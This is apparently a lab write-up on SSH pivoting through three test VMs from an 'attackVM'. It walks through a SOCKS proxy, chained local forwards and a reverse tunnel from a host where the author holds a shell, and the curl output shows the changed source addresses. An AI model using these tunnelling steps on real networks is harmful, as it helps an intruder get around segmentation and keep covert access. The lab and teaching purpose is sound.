-
Notifications
You must be signed in to change notification settings - Fork 3
I have set up a small test network of three Debian VMs and my attack VM.
- chicken (192.168.1.244)
- porkchop (192.168.1.243)
- steak (192.168.1.184)
- attackVM (192.168.1.134)
The steak
VM has a web server with a simple PHP page that displays the visitor's IP address.
<html>
<body>
<p>Did you say steak?</p>
<p><?php echo $_SERVER['REMOTE_ADDR']; ?></p>
</body>
</html>
Browsing with no intermediary hops.
attackVM $ curl http://steak.test.ssh/steak.php
<html>
<body>
<p>Did you say steak?</p>
<p>192.168.1.134</p>
</body>
</html>
Hosts involved:
- chicken (192.168.1.244)
- attackVM (192.168.1.134)
This is simple utilization of the -D
flag in the ssh client.
attackVM $ ssh -N -D 8282 [email protected]
Configure the browser in attackVM
to use a SOCKS proxy on 127.0.0.1:8282
since we selected 8282 for our SOCKS listener via -D
. Browse to steak
and we'll see that our IP is now 192.168.1.244 meaning we've connected through chicken
.
attackVM $ curl --socks5 127.0.0.1:8282 http://steak.test.ssh/steak.php
<html>
<body>
<p>Did you say steak?</p>
<p>192.168.1.244</p>
</body>
</html>
Hosts involved:
- chicken (192.168.1.244)
- porkchop (192.168.1.243)
- attackVM (192.168.1.134)
Now I'm going to use chicken
as a staging server which has access to an "internal" server, porkchop
. We'll establish an SSH connection between chicken
and porkchop
, then forward the SOCKS port from the initial connection and use it to browse through porkchop
from our attack VM.
attackVM $ ssh [email protected]
tuna@chicken:~$ ssh -N -D 8484 -p 4444 [email protected]
The SSH connection is now established between chicken
and porkchop
. Let's forward the SOCKS port 8484
to our attack VM.
attackVM $ ssh -N -L 127.0.0.1:44444:127.0.0.1:8484 [email protected]
Here we've forwarded the SOCKS listener on port 8484 of chicken
to our local port 44444. Configure the browser in attackVM
to use a SOCKS proxy on 127.0.0.1:44444
since we selected 44444 for forwarding our SOCKS listener via -L
. Browse to steak
and we'll see that our IP is now 192.168.1.243 meaning we've connected through porkchop
.
attackVM $ curl --socks5 127.0.0.1:44444 http://steak.test.ssh/steak.php
<html>
<body>
<p>Did you say steak?</p>
<p>192.168.1.243</p>
</body>
</html>
The key part here is that only the last hop is dynamic (-D
). All other listeners should be static (-L
).
Hosts involved:
- chicken (192.168.1.244)
- steak (192.168.1.184)
- attackVM (192.168.1.134)
In this scenario, let's assert we've got a shell on steak
but we cannot connect directly from our attackVM
. Instead, we'll set up a tunnel from steak
to chicken
; then establish a new connection from attackVM
to chicken
and connect locally on chicken
into the tunnel to reach our shell on steak
.
First set up the tunnel from steak
to chicken
. In this case, we have created an SSH key pair on steak
and added the public key to ~chicken/.ssh/authorized_keys
on chicken
.
filet@steak:~$ ssh -o StrictHostKeyChecking=no -o TCPKeepAlive=yes -p 22 -N -f -R 6666:127.0.0.1:5555 [email protected]
Note that SSH is listening on port 5555 on steak
, and the default 22 on chicken
. Next we'll connect to chicken
from attackVM
then complete the connection to steak
via the exposed listener.
attackVM $ ssh [email protected]
tuna@chicken:~$ ssh -p 6666 filet@localhost
filet@localhost's password:
filet@steak:~$ hostname --fqdn
steak.test.ssh
Now we have access to our shell on steak
using chicken
as an intermediary hop.